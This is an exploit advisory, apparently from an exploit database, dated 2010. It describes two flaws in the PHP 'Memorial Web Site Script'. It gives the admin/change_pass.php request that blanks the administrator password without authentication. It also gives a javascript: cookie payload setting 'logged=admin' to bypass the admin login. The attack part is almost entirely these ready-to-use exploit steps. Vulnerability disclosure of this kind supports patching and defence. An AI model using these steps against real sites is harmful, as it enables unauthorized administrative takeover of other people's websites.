Memorial Web Site Script --> Reset Password & Insecure Cookie Handling

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Memorial Web Site Script --> Reset Password & Insecure Cookie Handling
# Published : 2010-04-23
# Author : Chip D3 Bi0s
# Previous Title : Memorial Web Site Script Multiple Arbitrary Delete Vuln
# Next Title : LaNewsFactory Multiple Remote Vulnerabilities

-----------------------------------------------------------------------
Memorial Web Site Script --> Reset Password & Insecure Cookie Handling
----------------------------------------------------------------------- 
Author	: Chip D3 Bi0s
Email	: chipdebios[alt+64]gmail.com
Where	: From Remote
Group	: LatinHackTeam


Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application	: Memorial Web Site Script
Author		: Easy Scripts
Price		: $49
Vendor		: http://www.easy-scripts.net

description Bug:
~~~~~~~~~~~~~~~

To reset the password just use this:

http://127.0.0.1/[path]/admin/change_pass.php

so the password will be null, login with single user can
admin:

http://127.0.0.1/[path]/admin/

--------------------------

Insecure Cookie Handling

exploit:
javascript:document.cookie="logged=admin;path=/";

http://127.0.0.1/[path]/admin/
--------------------------



+++++++++++++++++++++++++++++++++++++++
#[!] Produced in South America
+++++++++++++++++++++++++++++++++++++++